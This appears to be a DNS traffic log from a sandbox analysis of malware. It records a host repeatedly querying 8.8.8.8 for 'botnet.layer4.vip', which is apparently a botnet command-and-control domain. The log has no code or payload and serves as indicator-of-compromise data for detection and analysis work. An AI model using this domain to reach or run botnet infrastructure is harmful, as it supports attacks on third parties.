                                  Apr 9, 2023 03:31:47.268038034 CEST192.168.2.238.8.8.80xac04Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.292215109 CEST192.168.2.238.8.8.80xac04Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.316420078 CEST192.168.2.238.8.8.80xac04Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.340612888 CEST192.168.2.238.8.8.80xac04Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.364819050 CEST192.168.2.238.8.8.80x19eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.380769014 CEST192.168.2.238.8.8.80x19eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.405227900 CEST192.168.2.238.8.8.80x19eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.429938078 CEST192.168.2.238.8.8.80x19eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.454405069 CEST192.168.2.238.8.8.80x19eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.479037046 CEST192.168.2.238.8.8.80xc818Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.494609118 CEST192.168.2.238.8.8.80xc818Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.518758059 CEST192.168.2.238.8.8.80xc818Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.543093920 CEST192.168.2.238.8.8.80xc818Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.567156076 CEST192.168.2.238.8.8.80xc818Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.591762066 CEST192.168.2.238.8.8.80x4a87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.616117001 CEST192.168.2.238.8.8.80x4a87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.631937027 CEST192.168.2.238.8.8.80x4a87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.647497892 CEST192.168.2.238.8.8.80x4a87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.671546936 CEST192.168.2.238.8.8.80x4a87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.695669889 CEST192.168.2.238.8.8.80x7a00Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.720050097 CEST192.168.2.238.8.8.80x7a00Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.735573053 CEST192.168.2.238.8.8.80x7a00Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.759618044 CEST192.168.2.238.8.8.80x7a00Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.783715010 CEST192.168.2.238.8.8.80x7a00Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.799396992 CEST192.168.2.238.8.8.80xe78eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.823853016 CEST192.168.2.238.8.8.80xe78eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.839308977 CEST192.168.2.238.8.8.80xe78eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.863702059 CEST192.168.2.238.8.8.80xe78eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.888078928 CEST192.168.2.238.8.8.80xe78eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.912506104 CEST192.168.2.238.8.8.80xe559Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.928550959 CEST192.168.2.238.8.8.80xe559Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.944153070 CEST192.168.2.238.8.8.80xe559Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.960268021 CEST192.168.2.238.8.8.80xe559Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.975891113 CEST192.168.2.238.8.8.80xe559Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.000263929 CEST192.168.2.238.8.8.80x6cbbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.015964985 CEST192.168.2.238.8.8.80x6cbbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.031897068 CEST192.168.2.238.8.8.80x6cbbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.056060076 CEST192.168.2.238.8.8.80x6cbbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.080164909 CEST192.168.2.238.8.8.80x6cbbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.104358912 CEST192.168.2.238.8.8.80xd80cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.119896889 CEST192.168.2.238.8.8.80xd80cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.143909931 CEST192.168.2.238.8.8.80xd80cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.168075085 CEST192.168.2.238.8.8.80xd80cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.183877945 CEST192.168.2.238.8.8.80xd80cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.208125114 CEST192.168.2.238.8.8.80x8b03Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.223939896 CEST192.168.2.238.8.8.80x8b03Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.248078108 CEST192.168.2.238.8.8.80x8b03Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.272520065 CEST192.168.2.238.8.8.80x8b03Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.297183037 CEST192.168.2.238.8.8.80x8b03Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.313343048 CEST192.168.2.238.8.8.80x8d32Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.329593897 CEST192.168.2.238.8.8.80x8d32Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.353827000 CEST192.168.2.238.8.8.80x8d32Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.369359970 CEST192.168.2.238.8.8.80x8d32Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.384968042 CEST192.168.2.238.8.8.80x8d32Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.401304960 CEST192.168.2.238.8.8.80x544Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.417123079 CEST192.168.2.238.8.8.80x544Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.442291975 CEST192.168.2.238.8.8.80x544Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.466500998 CEST192.168.2.238.8.8.80x544Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.492096901 CEST192.168.2.238.8.8.80x544Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.516805887 CEST192.168.2.238.8.8.80x3792Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.532761097 CEST192.168.2.238.8.8.80x3792Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.548458099 CEST192.168.2.238.8.8.80x3792Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.573029995 CEST192.168.2.238.8.8.80x3792Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.597255945 CEST192.168.2.238.8.8.80x3792Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.613368034 CEST192.168.2.238.8.8.80xa6aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.630573988 CEST192.168.2.238.8.8.80xa6aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.656343937 CEST192.168.2.238.8.8.80xa6aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.681757927 CEST192.168.2.238.8.8.80xa6aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.697783947 CEST192.168.2.238.8.8.80xa6aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.713618994 CEST192.168.2.238.8.8.80x61c5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.737864971 CEST192.168.2.238.8.8.80x61c5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.753374100 CEST192.168.2.238.8.8.80x61c5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.768971920 CEST192.168.2.238.8.8.80x61c5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.784889936 CEST192.168.2.238.8.8.80x61c5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.809061050 CEST192.168.2.238.8.8.80xbd0bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.833456993 CEST192.168.2.238.8.8.80xbd0bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.857913971 CEST192.168.2.238.8.8.80xbd0bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.873765945 CEST192.168.2.238.8.8.80xbd0bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.889647961 CEST192.168.2.238.8.8.80xbd0bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.905699015 CEST192.168.2.238.8.8.80xb86bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.921649933 CEST192.168.2.238.8.8.80xb86bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.946022034 CEST192.168.2.238.8.8.80xb86bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.970190048 CEST192.168.2.238.8.8.80xb86bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.986251116 CEST192.168.2.238.8.8.80xb86bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.002163887 CEST192.168.2.238.8.8.80xc0b4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.026604891 CEST192.168.2.238.8.8.80xc0b4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.042581081 CEST192.168.2.238.8.8.80xc0b4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.066998005 CEST192.168.2.238.8.8.80xc0b4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.091415882 CEST192.168.2.238.8.8.80xc0b4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.115660906 CEST192.168.2.238.8.8.80x26d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.131509066 CEST192.168.2.238.8.8.80x26d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.155767918 CEST192.168.2.238.8.8.80x26d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.180068970 CEST192.168.2.238.8.8.80x26d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.204674006 CEST192.168.2.238.8.8.80x26d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.220751047 CEST192.168.2.238.8.8.80x59f0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.236860037 CEST192.168.2.238.8.8.80x59f0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.261394024 CEST192.168.2.238.8.8.80x59f0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.285648108 CEST192.168.2.238.8.8.80x59f0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.311119080 CEST192.168.2.238.8.8.80x59f0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.335417032 CEST192.168.2.238.8.8.80x3398Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.360040903 CEST192.168.2.238.8.8.80x3398Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.384785891 CEST192.168.2.238.8.8.80x3398Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.400710106 CEST192.168.2.238.8.8.80x3398Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.416486025 CEST192.168.2.238.8.8.80x3398Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.432208061 CEST192.168.2.238.8.8.80x9accStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.456969023 CEST192.168.2.238.8.8.80x9accStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.481434107 CEST192.168.2.238.8.8.80x9accStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.497064114 CEST192.168.2.238.8.8.80x9accStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.521481991 CEST192.168.2.238.8.8.80x9accStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.546156883 CEST192.168.2.238.8.8.80x46acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.570839882 CEST192.168.2.238.8.8.80x46acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.586771011 CEST192.168.2.238.8.8.80x46acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.602863073 CEST192.168.2.238.8.8.80x46acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.618771076 CEST192.168.2.238.8.8.80x46acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.634996891 CEST192.168.2.238.8.8.80x8790Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.651087046 CEST192.168.2.238.8.8.80x8790Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.667068958 CEST192.168.2.238.8.8.80x8790Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.682821989 CEST192.168.2.238.8.8.80x8790Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.711107969 CEST192.168.2.238.8.8.80x8790Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.735464096 CEST192.168.2.238.8.8.80x678aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.759588957 CEST192.168.2.238.8.8.80x678aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.775774956 CEST192.168.2.238.8.8.80x678aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.791404009 CEST192.168.2.238.8.8.80x678aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.815480947 CEST192.168.2.238.8.8.80x678aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.831518888 CEST192.168.2.238.8.8.80x2152Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.847455025 CEST192.168.2.238.8.8.80x2152Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.863780975 CEST192.168.2.238.8.8.80x2152Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.879550934 CEST192.168.2.238.8.8.80x2152Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.904093981 CEST192.168.2.238.8.8.80x2152Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.920093060 CEST192.168.2.238.8.8.80x4479Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.944219112 CEST192.168.2.238.8.8.80x4479Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.960755110 CEST192.168.2.238.8.8.80x4479Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.976286888 CEST192.168.2.238.8.8.80x4479Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.000499010 CEST192.168.2.238.8.8.80x4479Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.016509056 CEST192.168.2.238.8.8.80x63c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.040695906 CEST192.168.2.238.8.8.80x63c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.056550026 CEST192.168.2.238.8.8.80x63c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.081151962 CEST192.168.2.238.8.8.80x63c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.105432987 CEST192.168.2.238.8.8.80x63c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.129937887 CEST192.168.2.238.8.8.80xfaa7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.155092001 CEST192.168.2.238.8.8.80xfaa7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.179702044 CEST192.168.2.238.8.8.80xfaa7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.203773022 CEST192.168.2.238.8.8.80xfaa7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.228353977 CEST192.168.2.238.8.8.80xfaa7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.244482994 CEST192.168.2.238.8.8.80xc879Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.260294914 CEST192.168.2.238.8.8.80xc879Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.284775972 CEST192.168.2.238.8.8.80xc879Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.300813913 CEST192.168.2.238.8.8.80xc879Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.316802979 CEST192.168.2.238.8.8.80xc879Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.341387033 CEST192.168.2.238.8.8.80x9755Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.357013941 CEST192.168.2.238.8.8.80x9755Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.381176949 CEST192.168.2.238.8.8.80x9755Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.396784067 CEST192.168.2.238.8.8.80x9755Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.412451982 CEST192.168.2.238.8.8.80x9755Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.437012911 CEST192.168.2.238.8.8.80xe101Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.452898979 CEST192.168.2.238.8.8.80xe101Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.468862057 CEST192.168.2.238.8.8.80xe101Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.484509945 CEST192.168.2.238.8.8.80xe101Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.500330925 CEST192.168.2.238.8.8.80xe101Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.524923086 CEST192.168.2.238.8.8.80x43ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.549691916 CEST192.168.2.238.8.8.80x43ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.574150085 CEST192.168.2.238.8.8.80x43ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.590090990 CEST192.168.2.238.8.8.80x43ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.605783939 CEST192.168.2.238.8.8.80x43ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.621781111 CEST192.168.2.238.8.8.80xbe3bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.637723923 CEST192.168.2.238.8.8.80xbe3bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.661874056 CEST192.168.2.238.8.8.80xbe3bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.677828074 CEST192.168.2.238.8.8.80xbe3bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.693834066 CEST192.168.2.238.8.8.80xbe3bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.718566895 CEST192.168.2.238.8.8.80x77e2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.743172884 CEST192.168.2.238.8.8.80x77e2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.767499924 CEST192.168.2.238.8.8.80x77e2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.791733027 CEST192.168.2.238.8.8.80x77e2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.808258057 CEST192.168.2.238.8.8.80x77e2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.832834959 CEST192.168.2.238.8.8.80xefeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.848812103 CEST192.168.2.238.8.8.80xefeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.874264002 CEST192.168.2.238.8.8.80xefeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.891158104 CEST192.168.2.238.8.8.80xefeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.916646957 CEST192.168.2.238.8.8.80xefeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.933815002 CEST192.168.2.238.8.8.80x9bacStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.958405018 CEST192.168.2.238.8.8.80x9bacStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.982649088 CEST192.168.2.238.8.8.80x9bacStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.998785019 CEST192.168.2.238.8.8.80x9bacStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.014466047 CEST192.168.2.238.8.8.80x9bacStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.038961887 CEST192.168.2.238.8.8.80x1ca7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.063472986 CEST192.168.2.238.8.8.80x1ca7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.079351902 CEST192.168.2.238.8.8.80x1ca7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.103816986 CEST192.168.2.238.8.8.80x1ca7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.119724035 CEST192.168.2.238.8.8.80x1ca7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.144469023 CEST192.168.2.238.8.8.80x1c56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.160789967 CEST192.168.2.238.8.8.80x1c56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.186033010 CEST192.168.2.238.8.8.80x1c56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.201561928 CEST192.168.2.238.8.8.80x1c56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.225699902 CEST192.168.2.238.8.8.80x1c56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.241271019 CEST192.168.2.238.8.8.80x436fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.257236958 CEST192.168.2.238.8.8.80x436fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.281565905 CEST192.168.2.238.8.8.80x436fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.306020975 CEST192.168.2.238.8.8.80x436fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
